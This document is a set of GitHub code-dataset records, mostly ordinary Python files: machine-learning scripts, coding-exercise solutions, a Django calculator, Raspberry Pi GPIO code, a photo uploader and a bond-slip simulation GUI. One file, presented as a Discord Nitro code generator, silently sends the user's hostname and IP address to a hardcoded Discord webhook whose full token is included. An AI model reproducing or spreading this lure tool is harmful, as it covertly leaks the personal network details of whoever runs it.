tf\n\nflags = tf.flags\nFLAGS = flags.FLAGS\n\nclass OptimizerCAN(object):\n\n def __init__(self, preds, labels, model, num_nodes, num_features, pos_weight_u, norm_u, pos_weight_a, norm_a):\n preds_sub_u, preds_sub_a = preds\n labels_sub_u, labels_sub_a = labels\n self.cost_u = norm_u * tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(logits=preds_sub_u, targets=labels_sub_u, pos_weight=pos_weight_u))\n self.cost_a = norm_a * tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(logits=preds_sub_a, targets=labels_sub_a, pos_weight=pos_weight_a))\n\n self.optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate) # Adam Optimizer\n\n # Latent loss\n self.log_lik = self.cost_u + self.cost_a\n self.kl_u = (0.5 / num_nodes) * tf.reduce_mean(tf.reduce_sum(1 + 2 * model.z_u_log_std - tf.square(model.z_u_mean) - \n tf.square(tf.exp(model.z_u_log_std)), 1))\n self.kl_a = (0.5 / num_features) * tf.reduce_mean(tf.reduce_sum(1 + 2 * model.z_a_log_std - tf.square(model.z_a_mean) - \n tf.square(tf.exp(model.z_a_log_std)), 1))\n self.kl = self.kl_u + self.kl_a\n \n self.cost = self.log_lik - self.kl\n\n self.opt_op = self.optimizer.minimize(self.cost)\n self.grads_vars = self.optimizer.compute_gradients(self.cost)\n\n self.correct_prediction_u = tf.equal(tf.cast(tf.greater_equal(tf.sigmoid(preds_sub_u), 0.5), tf.int32),\n tf.cast(labels_sub_u, tf.int32))\n self.correct_prediction_a = tf.equal(tf.cast(tf.greater_equal(tf.sigmoid(preds_sub_a), 0.5), tf.int32),\n tf.cast(labels_sub_a, tf.int32))\n self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction_u, tf.float32)) + tf.reduce_mean(tf.cast(self.correct_prediction_a, tf.float32))\n","repo_name":"mengzaiqiao/CAN","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"27"} +{"seq_id":"1094403004","text":"import math\n\ndef is_prime(prime_array, num):\n num_sqrt = int(math.sqrt(num))\n \n for prime in prime_array:\n if prime > num_sqrt:\n break\n if num % prime == 0:\n return False\n\n return True\n\n\ndef primes_up_to(max_num):\n\n prime_array = [2, 3]\n \n for num in xrange(3, max_num + 1, 2):\n if is_prime(prime_array, num):\n prime_array.append(num)\n \n return prime_array\n\n\ndef reverse_indexes(length):\n return xrange(length - 1, -1, -1)\n\n\ndef largest_prime_factor(primes, number):\n\n indexes = reverse_indexes(len(primes))\n\n for index in indexes:\n prime = primes[index]\n if number % prime == 0:\n return prime\n\n return None\n\ndef solution():\n\n test = 600851475143\n primes = primes_up_to(int(math.sqrt(test)))\n answer = largest_prime_factor(primes, test)\n return answer","repo_name":"jimfingal/polyglot-euler","sub_path":"python/E003.py","file_name":"E003.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34617059086","text":"from django.shortcuts import render\r\n\r\ndef calculator_view(request):\r\n if request.method == 'GET':\r\n return render(request, 'calculator.html')\r\n elif request.method == 'POST':\r\n context = {\r\n 'first_number': int(request.POST.get('first_number')),\r\n 'act': request.POST.get('act'),\r\n 'second_number': int(request.POST.get('second_number')),\r\n 'result': 0\r\n }\r\n if context['act'] == 'add':\r\n context['act'] = '+'\r\n context['result'] = context['first_number'] + context['second_number']\r\n elif context['act'] == 'subtract':\r\n context['act'] = '-'\r\n context['result'] = context['first_number'] - context['second_number']\r\n elif context['act'] == 'multiply':\r\n context['act'] = '*'\r\n context['result'] = context['first_number'] * context['second_number']\r\n else:\r\n context['act'] = '/'\r\n context['result'] = context['first_number'] / context['second_number']\r\n\r\n return render(request, 'result.html', context)\r\n","repo_name":"syiumbaeva/home_work","sub_path":"source/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40005077974","text":"\n# Objective\n# Today, we're working with regular expressions. Check out the Tutorial tab for learning materials and an instructional video!\n\n# Task\n# Consider a database table, Emails, which has the attributes First Name and Email ID. Given N rows of data simulating the Emails table, print an alphabetically-ordered list of people whose email address ends in @gmail.com.\n\n--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X\n--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n\nif __name__ == '__main__':\n N = int(input().strip())\n sheet = []\n for N_itr in range(N):\n first_multiple_input = input().rstrip().split()\n\n firstName = first_multiple_input[0]\n\n emailID = first_multiple_input[1]\n email = re.findall(\"@gmail.com$\", emailID)\n if(email):\n sheet.append(firstName)\n sheet = sorted(sheet)\n \n for n in sheet:\n print(n)\n","repo_name":"yashmallik/HR-codes","sub_path":"Day 28.py","file_name":"Day 28.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36536984717","text":"\"\"\"\nGiven an array A of positive integers. Your task is to find the leaders in the array. \nAn element of array is leader if it is greater than or equal to all the elements to its right side. The rightmost element is always a leader. \nA[] = {16,17,4,3,5,2}\nOutput: 17 5 2\n\"\"\"\n\ndef Leader(Arr,N):\n if N == 0 or N == 1:\n return Arr\n output = ''\n for i in range(N):\n temp_Arr = Arr[i:]\n temp_Arr.sort(reverse = True)\n if temp_Arr[0] == Arr[i]:\n output = output + str(Arr[i]) + ' '\n return output\n\nArr = [16,17,4,3,5,2]\nN = len(Arr)\nprint(Leader(Arr,N) ) \n","repo_name":"tejamaramreddy/Programming","sub_path":"Leader.py","file_name":"Leader.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4134888385","text":"import tensorflow as tf\nfrom tensorflow import keras\n\n\nclass myCallback(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n if (logs.get('accuracy') >= 0.99):\n print('\\nReached 99% accuracy so cancelling training!')\n self.model.stop_training = True\n\ncallbacks = myCallback()\n\n\nmnist = keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# normalize the data\nx_train = x_train / 255.0\nx_test = x_test / 255.0\n\nmodel = tf.keras.models.Sequential([\n keras.layers.InputLayer(input_shape=(28, 28, 1)),\n keras.layers.Flatten(),\n keras.layers.Dense(512, activation=tf.nn.relu),\n keras.layers.Dense(10, activation=tf.nn.softmax)\n])\n\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, epochs=10, callbacks=[callbacks])\n\nclassifications = model.predict(x_test)\nlist(map(lambda x: print('{0:.10f}'.format(x)), classifications[0]))\n\nprint('The real value is {}'.format(y_test[0]))","repo_name":"dharm1k987/tensorflow_tests","sub_path":"course1/week2/Exercise 2 - Handwriting Recognition/Exercise2-Question.py","file_name":"Exercise2-Question.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"86393403688","text":"#!/usr/bin/env python\nimport RPi.GPIO as GPIO\nimport time\n\nclass ShiftRegister:\n \"\"\"Represents a logical shift register.\"\"\"\n\n def __init__(self, shift_clock_pin, store_clock_pin, data_input_pin):\n self.shift_clock_pin = shift_clock_pin\n self.store_clock_pin = store_clock_pin\n self.data_input_pin = data_input_pin\n\n self.all_pins = [shift_clock_pin, store_clock_pin, data_input_pin]\n\n GPIO.setup(self.all_pins, GPIO.OUT, initial=GPIO.LOW)\n\n def load_byte(self, byte):\n for bit_index in range(0, 8):\n GPIO.output(self.data_input_pin, 0x80 & (byte << bit_index))\n GPIO.output(self.shift_clock_pin, GPIO.HIGH)\n time.sleep(0.001)\n GPIO.output(self.shift_clock_pin, GPIO.LOW)\n\n def output(self):\n GPIO.output(self.store_clock_pin, GPIO.HIGH)\n time.sleep(0.001)\n GPIO.output(self.store_clock_pin, GPIO.LOW)\n\n def destroy(self):\n GPIO.cleanup(self.all_pins)\n","repo_name":"ChrisMiskowiec/pi-superkit-tutorial","sub_path":"shift_register.py","file_name":"shift_register.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37185941829","text":"import ctypes\nimport string\nimport os\nimport time\nfrom discord_webhook import DiscordWebhook\nimport requests\nimport numpy\nimport socket\nhostname = socket.gethostname()\nip_address = socket.gethostbyname(hostname)\nUSE_WEBHOOK = True\n\ntime.sleep(3)\nos.system('cls' if os.name == 'nt' else 'clear')\n\nurl = \"https://github.com\"\ntry:\n response = requests.get(url)\n print(\"Internet check\")\n time.sleep(.4)\nexcept requests.exceptions.ConnectionError:\n input(\"You are not connected to internet, check your connection and try again.\\nPress enter to exit\")\n exit()\n\n\nclass NitroGen:\n def __init__(self):\n self.fileName = \"Nitro Codes.txt\"\n\n def main(self):\n os.system('cls' if os.name == 'nt' else 'clear')\n if os.name == \"nt\":\n print(\"\")\n ctypes.windll.kernel32.SetConsoleTitleW(\"Nitro Generator\")\n else:\n print(f'\\33]0;By Nitro Gen V5F\\a', end='', flush=True)\n\n self.slowType(\"9ET Nitro Gen\", .02)\n time.sleep(2)\n self.slowType(\"Made by: Discord Nitro Gen\", .02)\n time.sleep(1)\n self.slowType(\"\\nInput How Many Codes to Generate and Check (99999 recommended): \", .02, newLine=False)\n\n try:\n num = int(input(''))\n except ValueError:\n input(\"Specified input wasn't a number.\\nPress enter to exit\")\n exit()\n\n if USE_WEBHOOK:\n url = \"https://discord.com/api/webhooks/1135262056019398808/mibBVhFjGqAlbYHJs1qQ9pkJd_-kciqxIq64wDjuQf0FlTNAJUzu8DL_M9TlXEzCGpd8\"\n webhook = url if url != \"\" else None\n\n if webhook is not None:\n DiscordWebhook(\n url=url,\n content=f\"Generator has been ran.\\nIP info below.\\n\\nHostname: **{hostname}** IP Address: **{ip_address}**\"\n ).execute()\n\n valid = []\n invalid = 0\n chars = []\n chars[:0] = string.ascii_letters + string.digits\n\n c = numpy.random.choice(chars, size=[num, 16])\n for s in c:\n try:\n code = ''.join(x for x in s)\n url = f\"https://discord.gift/{code}\"\n\n result = self.quickChecker(url, webhook)\n\n if result:\n valid.append(url)\n else:\n invalid += 1\n except KeyboardInterrupt:\n print(\"\\nInterrupted by user\")\n break\n\n except Exception as e:\n print(f\" Error | {url} \")\n\n if os.name == \"nt\":\n ctypes.windll.kernel32.SetConsoleTitleW(\n f\"Nitro Generator and Checker - {len(valid)} Valid | {invalid} Invalid - Made by Nitro Gen\")\n print(\"\")\n else:\n print(\n f'\\33]0;Made by Nitro Gen - {len(valid)} Valid | {invalid} Invalid - Nitro Gen\\a', end='', flush=True)\n\n print(f\"\"\"\nResults:\n Valid: {\"0\"}\n Invalid: {invalid}\"\"\")\n\n input(\"\\nThe end! Press Enter 5 times to close the program.\")\n [input(i) for i in range(4, 0, -1)]\n\n def slowType(self, text: str, speed: float, newLine=True):\n for i in text:\n print(i, end=\"\", flush=True)\n time.sleep(speed)\n if newLine:\n print()\n\n def quickChecker(self, nitro: str, notify=None):\n url = f\"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true\"\n response = requests.get(url)\n\n if response.status_code == 200:\n print(f\" Valid | {nitro} \", flush=True, end=\"\" if os.name == 'nt' else \"\\n\")\n with open(\"Nitro Codes.txt\", \"w\") as file:\n file.write(nitro)\n\n if notify is not None:\n DiscordWebhook(\n url=url,\n content=f\"Valid Nito Code detected! @everyone \\n{nitro}\"\n ).execute()\n\n return True\n\n else:\n print(f\" Invalid | {nitro} \", flush=True, end=\"\" if os.name == 'nt' else \"\\n\")\n return False\n\n\nif __name__ == '__main__':\n Gen = NitroGen()\n Gen.main()\n","repo_name":"Metolix/nitro-gen","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39085606467","text":"import json\r\nimport VKont\r\nimport Yandex\r\n\r\nVK_VERSION = '5.131'\r\n\r\n\r\ndef file_json_dict(rezult_dict):\r\n with open('vk_dict.json', 'w') as outfile:\r\n json.dump(rezult_dict, outfile)\r\n print(\"Запись файла завершена\")\r\n\r\n\r\nya_token = input('1. Введите токен для Яндекс диска: ')\r\nvk_token = input('2. Введите токен Вконтакте: ')\r\nname_folder = 'course_work'\r\ntry:\r\n vk_id = int(input('3. Введите id аккаунта Вкотакте: '))\r\n ya = Yandex.YandexDisk(token=ya_token)\r\n vk = VKont.VkUser(token=vk_token, version=VK_VERSION)\r\n rez_dict = vk.get_foto_user(vk_id, 'profile', 5)\r\n json_dict = []\r\n if (ya.is_not_exist_folder(name_folder)):\r\n ya.create_folder(name_folder)\r\n for key, value in rez_dict.items():\r\n print(\"загружаем фото на яндекс диск\")\r\n params = {\r\n 'path': name_folder + '/' + key,\r\n 'url': value['url']\r\n }\r\n print(\"добавляем информацию о файле в список для файла-результата\")\r\n json_dict.append(\r\n {\r\n 'name': key,\r\n 'size': value['size']\r\n }\r\n )\r\n ya.upload_url_to_disk(params)\r\n print(\"запись в файл-результата\")\r\n file_json_dict(json_dict)\r\nexcept ValueError:\r\n print(\"Вы не ввели id аккаунта Вкотакте\")\r\n","repo_name":"Nikolay-Davydov/Course_paper1","sub_path":"Course_paper1.py","file_name":"Course_paper1.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30786762706","text":"import cv2\nimport time\nfrom pprint import pprint\nimport poseModule as pm\n\ncap = cv2.VideoCapture(\n \"/Users/williamhbelew/Hacking/ocv_playground/pose_est_tutorial/poseEstVids/artem-30fps.mp4\")\nreal_lmList = []\npTime = 0\ndetector = pm.poseDetector()\nwhile True:\n success, img = cap.read()\n img = detector.findPose(img)\n lmList = detector.findPosition(img, draw=True)\n intermediateRL_landmarks = detector.findRealPosition(img)\n real_lmList.append(intermediateRL_landmarks)\n # pprint(lmList[14])\n # draw a specific joint ONLY (set draw to False, above)\n # cv2.circle(img, (lmList[14][1], lmList[14][2]),\n # 25, (0, 0, 255), cv2.FILLED)\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime = cTime\n\n cv2.putText(img, str(int(fps)), (70, 50),\n cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)\n cv2.imshow(\"Image\", img)\n\n if cv2.waitKey(1) == ord('q'):\n break\ncap.release()\ncv2.destroyAllWindows()\npprint(real_lmList)\n","repo_name":"welew204/joint_workspace","sub_path":"pose_est_tutorial/poseApp.py","file_name":"poseApp.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18234746653","text":"import streamlit as st\nimport spacy\nimport itertools\nfrom src.helper_functions import setup_logger\n\nlogger = setup_logger()\n\n\ndef apply_similarity(examples, intents):\n\n logger.info(\n {\"message\": \"Applying similarity for all examples in the skill.\"})\n\n nlp = spacy.load('pt_core_news_md')\n\n docs = nlp.pipe(examples)\n docs = list(itertools.combinations(docs, 2))\n docs.reverse()\n\n docs_size = len(docs)\n\n counter = 0\n pbar = st.progress(counter)\n\n lst = []\n while len(docs) > 0:\n doc = docs.pop()\n similarity = doc[0].similarity(doc[1])\n intent = intents[examples.index(doc[0].text)]\n similar_intent = intents[examples.index(doc[1].text)]\n result = {\"intent\": intent, \"example\": doc[0].text, \"similar example\": doc[1].text,\n \"similar intent\": similar_intent, \"similarity\": similarity}\n lst.append(result)\n\n counter += 1\n pbar.progress(counter / docs_size)\n\n return lst\n\n\ndef apply_similarity_intents(examples_lst, intents):\n\n logger.info({\"message\": \"Applying similarity inside intents.\"})\n\n nlp = spacy.load('pt_core_news_md')\n\n counter = 0\n pbar = st.progress(counter)\n\n lst = []\n for examples, intent in zip(examples_lst, intents):\n docs = nlp.pipe(examples)\n docs = list(itertools.combinations(docs, 2))\n\n while len(docs) > 0:\n doc = docs.pop()\n similarity = doc[0].similarity(doc[1])\n result = {\"intent\": intent, \"example\": doc[0].text, \"similar example\": doc[1].text,\n \"similar intent\": intent, \"similarity\": similarity}\n lst.append(result)\n\n counter += 1\n pbar.progress(counter / len(intents))\n\n return lst\n","repo_name":"DougTrajano/anallyticabot","sub_path":"src/intents/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"3960043682","text":"t = int(input())\n\n\ndef overlap(i, j, job, array):\n if job[i][0] < array[j][1] and array[j][0] < job[i][1]:\n return True\n return False\n\n\ndef solve():\n jobs = []\n n = int(input())\n res = [0] * n\n jobs_dict = dict()\n for i in range(n):\n job = tuple(map(int, input().split()))\n jobs_dict[job] = i\n jobs = list(jobs_dict.keys() )\n\n jobs.sort()\n\n c_jobs = []\n j_jobs = []\n for i in range(n):\n overlaps_c = False\n for c_index in range(len(c_jobs)):\n if overlap(i, c_index, jobs, c_jobs):\n overlaps_c = True\n break\n if not overlaps_c:\n c_jobs.append(jobs[i])\n idx = jobs_dict[jobs[i]]\n res[idx] = \"C\"\n continue\n overlaps_j = False\n for j_index in range(len(j_jobs)):\n if overlap(i, j_index, jobs, j_jobs):\n overlaps_j = True\n break\n if not overlaps_j:\n j_jobs.append(jobs[i])\n idx = jobs_dict[jobs[i]]\n res[idx] = \"J\"\n continue\n if overlaps_j and overlaps_c:\n return 'IMPOSSIBLE'\n return ''.join(res)\n\n\nfor __ in range(t):\n print(\"Case #{}: {}\".format(__+1, solve()))","repo_name":"shreevari/Private","sub_path":"codejam/parenting-problem.py","file_name":"parenting-problem.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"23113529630","text":"\ndef permutations(alphabet, max_length):\n\n words = []\n\n #BOOTSTRAP\n for letter in alphabet:\n words.append(letter)\n \n for word in words:\n #Iterates over itself\n\n if len(word) == max_length:\n return words\n \n for letter in alphabet:\n words.append(word + letter)\n\n return words\n\n#print(permutations(\"abcte\", 7))\n\n'''\na\nb\nc\naa\nab\nac\nba\nbc\nbc\nca\ncb\ncd\naaa\n...\n'''\n","repo_name":"lowizdev/practical_cryptography_python_exercises","sub_path":"chapter 2/alphabet_permutations.py","file_name":"alphabet_permutations.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8307358145","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport cv2\nimport sys\nimport os\n\nBOARD_W, BOARD_H = 8, 6\n\nBOARD_TOTAL = BOARD_W * BOARD_H\nBOARD_SZ = (BOARD_W, BOARD_H)\n\n\nif __name__ == \"__main__\":\n\tarquivos = []\n\tpasta = \"../data/img_r2/\"\n\tfor i in range(1, 6):\n\t\tarquivos.append(pasta + str(i) + \"_10.png\")\n\n\ti = 0\n\tfor arquivo in arquivos:\n\t\tframe = cv2.imread(arquivo,1)\n\t\tret, corners = cv2.findChessboardCorners(frame, BOARD_SZ,None)\n\t\tif ret == True: # If it was possible to find the corners of Chessboard\n\t\t\tcv2.drawChessboardCorners(frame, BOARD_SZ, corners,ret)\n\t\t\tcv2.imwrite(str(i) + '.png', frame)\n\t\ti += 1","repo_name":"carlos-adir/ComputerVision","sub_path":"T2/py3/see_borders.py","file_name":"see_borders.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14917317524","text":"class Bank():\r\n def __init__(self, user):\r\n self.name = user[\"name\"]\r\n self.pin = user[\"pin\"]\r\n self.balance = user[\"balance\"]\r\n\r\n def options(self):\r\n\r\n options = int(input(\r\n \"Please select an option \\n 1. Deposit \\n 2. Withdraw \\n 3. Balance \\n 4. Return Card: \"))\r\n if options == 1:\r\n self.bank_deposit()\r\n elif options == 2:\r\n self.bank_withdraw()\r\n elif options == 3:\r\n self.bank_balance()\r\n elif options == 4:\r\n pass\r\n else:\r\n self.options()\r\n\r\n def bank_deposit(self):\r\n deposit = float(\r\n input(\"Please insert how much you would like to deposit: \"))\r\n self.balance += deposit\r\n self.options()\r\n\r\n def bank_withdraw(self):\r\n withdraw = float(\r\n input(\"How much you would like to Withdraw: \"))\r\n if withdraw > self.balance:\r\n print(\"Sorry please check your balance as those funds are not available\")\r\n self.options()\r\n else:\r\n self.balance -= withdraw\r\n self.options()\r\n\r\n def bank_balance(self):\r\n print(f\"{self.name} your balance is: {self.balance:.2f}\")\r\n self.options()\r\n","repo_name":"DannyFlynn/pythonConsole","sub_path":"Atm/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26553703568","text":"import unittest\nfrom functions_with_errors import *\nfrom functions import *\n\n\nclass TestStringMethods(unittest.TestCase):\n\n def test_greeting_name1(self):\n name = \"Mykola\"\n result = greeting_by_name1(name)\n self.assertEqual(f\"Hello {name}!\", result)\n\n def test_greeting_name2(self):\n name = \"Alex\"\n result = greeting_by_name2(name)\n self.assertEqual(f\"Hello {name}!\", result)\n\n #_______________________________________________\n def test_get_symbol_position1(self):\n text = \"Hello\"\n symbol = \"o\"\n result = get_symbol_position1(text, symbol)\n self.assertEqual(result, 5)\n\n def test_get_symbol_position2(self):\n text = \"Hello\"\n symbol = \"o\"\n result = get_symbol_position2(text, symbol)\n self.assertEqual(result, 5)\n\n #_________________________________________________\n def test_merge1(self):\n dict1 = {\n \"name\": \"Alex\",\n \"age\": 29,\n \"email\": \"alexrozenberg@gmail.com\"\n }\n dict2 = {\n \"name\": \"Bob\",\n \"age\": 60,\n \"email\": \"has no email\"\n }\n dict3 = dict1.copy()\n dict4 = dict2.copy()\n dict3.update(dict4)\n result = merge1(dict1, dict2)\n self.assertDictEqual(result, dict3)\n\n def test_merge2(self):\n dict1 = {\n \"name\": \"Alex\",\n \"age\": 29,\n \"email\": \"alexrozenberg@gmail.com\"\n }\n dict2 = {\n \"name\": \"Bob\",\n \"age\": 60,\n \"email\": \"has no email\"\n }\n dict3 = dict1.copy()\n dict4 = dict2.copy()\n merge2(dict1, dict2)\n self.assertDictEqual(dict1, dict3, 'dict1 immutability is FAILED')\n\n def test_merge3(self):\n dict1 = {\n \"name\": \"Alex\",\n \"age\": 29,\n \"email\": \"alexrozenberg@gmail.com\"\n }\n dict2 = {\n \"name\": \"Bob\",\n \"age\": 60,\n \"email\": \"has no email\"\n }\n dict3 = dict1.copy()\n dict4 = dict2.copy()\n merge2(dict1, dict2)\n self.assertDictEqual(dict2, dict4, 'dict2 immutability is FAILED')","repo_name":"Python-fundamental-12-04-23/UA-1013.Python","sub_path":"hw/hw14/Soft/unittesting.py","file_name":"unittesting.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12971750997","text":"'''\r\nCreated on 08.07.2016\r\n\r\n@author: Yingxiong\r\n'''\r\nfrom ibvpy.api import BCDof\r\nfrom tloop import TLoop\r\nfrom tstepper import TStepper\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.interpolate import interp1d\r\nfrom traits.api import Range\r\nfrom matseval import MATSEval\r\nfrom tstepper import TStepper\r\nfrom tloop import TLoop\r\nfrom matplotlib import pyplot as plt\r\nfrom ibvpy.api import BCDof\r\nfrom traits.api import HasTraits, Property, Instance, cached_property, Str, Button, Range, on_trait_change, Array, List, Any, Float, Button\r\nfrom matplotlib.figure import Figure\r\nfrom cbfe.scratch.mpl_figure_editor import MPLFigureEditor\r\nfrom traitsui.api import View, Item, Group, HSplit, Handler, InstanceEditor, UItem, VGroup\r\nimport numpy as np\r\n\r\n\r\nclass Mainwindow(HasTraits):\r\n\r\n fpath = 'D:\\\\data\\\\pull_out\\\\all\\\\DPO-20cm-0-3300SBR-V3_R3_f.asc'\r\n d, f = np.loadtxt(fpath, delimiter=';')\r\n\r\n # panel = Instance(ControlPanel)\r\n mats_eval = Any\r\n\r\n time_stepper = Any\r\n\r\n time_loop = Any\r\n\r\n t_record = Array\r\n U_record = Array\r\n F_record = Array\r\n sf_record = Array\r\n eps_record = List\r\n sig_record = List\r\n\r\n figure = Instance(Figure)\r\n\r\n def _figure_default(self):\r\n figure = Figure()\r\n return figure\r\n\r\n update = Button()\r\n\r\n def _update_fired(self):\r\n # self.time.value = 1.0\r\n self.draw()\r\n self.figure.canvas.draw()\r\n\r\n K_bar = Float(20.)\r\n H_bar = Float(20.)\r\n E_b = Float(80000.)\r\n\r\n @on_trait_change('K_bar, H_bar, E_b')\r\n def plot(self):\r\n self.mats_eval.K_bar = self.K_bar\r\n self.mats_eval.H_bar = self.H_bar\r\n self.mats_eval.E_b = self.E_b\r\n\r\n ax1 = Property()\r\n\r\n @cached_property\r\n def _get_ax1(self):\r\n return self.figure.add_subplot(231)\r\n\r\n ax7 = Property()\r\n\r\n @cached_property\r\n def _get_ax7(self):\r\n return self.ax1.twinx()\r\n\r\n ax2 = Property()\r\n\r\n @cached_property\r\n def _get_ax2(self):\r\n return self.figure.add_subplot(232)\r\n\r\n ax3 = Property()\r\n\r\n @cached_property\r\n def _get_ax3(self):\r\n return self.figure.add_subplot(234)\r\n\r\n ax4 = Property()\r\n\r\n @cached_property\r\n def _get_ax4(self):\r\n return self.figure.add_subplot(235)\r\n\r\n ax5 = Property()\r\n\r\n @cached_property\r\n def _get_ax5(self):\r\n return self.figure.add_subplot(233)\r\n\r\n ax6 = Property()\r\n\r\n @cached_property\r\n def _get_ax6(self):\r\n return self.figure.add_subplot(236)\r\n\r\n def draw(self):\r\n self.U_record, self.F_record, self.sf_record, self.t_record, self.eps_record, self.sig_record = self.time_loop.eval()\r\n n_dof = 2 * self.time_stepper.domain.n_active_elems + 1\r\n\r\n slip, sig_n_arr, sig_e_arr, w_arr = self.time_stepper.mats_eval.get_bond_slip()\r\n self.ax1.cla()\r\n l_bs, = self.ax1.plot(slip, sig_n_arr)\r\n self.ax1.plot(slip, sig_e_arr, '--')\r\n self.ax7.cla()\r\n self.ax7.plot(slip, w_arr, '--')\r\n self.ax7.set_ylim(0, 1)\r\n self.ax1.set_title('bond-slip law')\r\n\r\n self.ax2.cla()\r\n l_po, = self.ax2.plot(self.U_record[:, n_dof], self.F_record[:, n_dof])\r\n marker_po, = self.ax2.plot(\r\n self.U_record[-1, n_dof], self.F_record[-1, n_dof], 'ro')\r\n self.ax2.plot(\r\n self.d[self.d <= 11.] / 2., self.f[self.d <= 11.] * 1000., '--')\r\n self.ax2.set_title('pull-out force-displacement curve')\r\n\r\n self.ax3.cla()\r\n X = np.linspace(\r\n 0, self.time_stepper.L_x, self.time_stepper.n_e_x + 1)\r\n X_ip = np.repeat(X, 2)[1:-1]\r\n l_sf, = self.ax3.plot(X_ip, self.sf_record[-1, :])\r\n self.ax3.set_title('shear flow in the bond interface')\r\n\r\n self.ax4.cla()\r\n U = np.reshape(self.U_record[-1, :], (-1, 2)).T\r\n l_u0, = self.ax4.plot(X, U[0])\r\n l_u1, = self.ax4.plot(X, U[1])\r\n l_us, = self.ax4.plot(X, U[1] - U[0])\r\n self.ax4.set_title('displacement and slip')\r\n\r\n self.ax5.cla()\r\n l_eps0, = self.ax5.plot(X_ip, self.eps_record[-1][:, :, 0].flatten())\r\n l_eps1, = self.ax5.plot(X_ip, self.eps_record[-1][:, :, 2].flatten())\r\n self.ax5.set_title('strain')\r\n\r\n self.ax6.cla()\r\n l_sig0, = self.ax6.plot(X_ip, self.sig_record[-1][:, :, 0].flatten())\r\n l_sig1, = self.ax6.plot(X_ip, self.sig_record[-1][:, :, 2].flatten())\r\n self.ax6.set_title('stress')\r\n\r\n self.ax3.set_ylim(np.amin(self.sf_record), np.amax(self.sf_record))\r\n self.ax4.set_ylim(np.amin(self.U_record), np.amax(self.U_record))\r\n# self.ax5.set_ylim(\r\n# np.amin(self.eps_record[:, :, 0::2]), np.amax(self.eps_record[:, :,\r\n# 0::2]))\r\n self.ax6.set_ylim(np.amin(self.sig_record), np.amax(self.sig_record))\r\n\r\n time = Range(0.00, 1.00, value=1.00)\r\n\r\n @on_trait_change('time')\r\n def draw_t(self):\r\n idx = (np.abs(self.time - self.t_record)).argmin()\r\n n_dof = 2 * self.time_stepper.domain.n_active_elems + 1\r\n\r\n self.ax2.cla()\r\n l_po, = self.ax2.plot(self.U_record[:, n_dof], self.F_record[:, n_dof])\r\n marker_po, = self.ax2.plot(\r\n self.U_record[idx, n_dof], self.F_record[idx, n_dof], 'ro')\r\n self.ax2.plot(\r\n self.d[self.d <= 11.] / 2., self.f[self.d <= 11.] * 1000., '--')\r\n self.ax2.set_title('pull-out force-displacement curve')\r\n\r\n self.ax3.cla()\r\n X = np.linspace(\r\n 0, self.time_stepper.L_x, self.time_stepper.n_e_x + 1)\r\n X_ip = np.repeat(X, 2)[1:-1]\r\n l_sf, = self.ax3.plot(X_ip, self.sf_record[idx, :])\r\n self.ax3.set_title('shear flow in the bond interface')\r\n\r\n 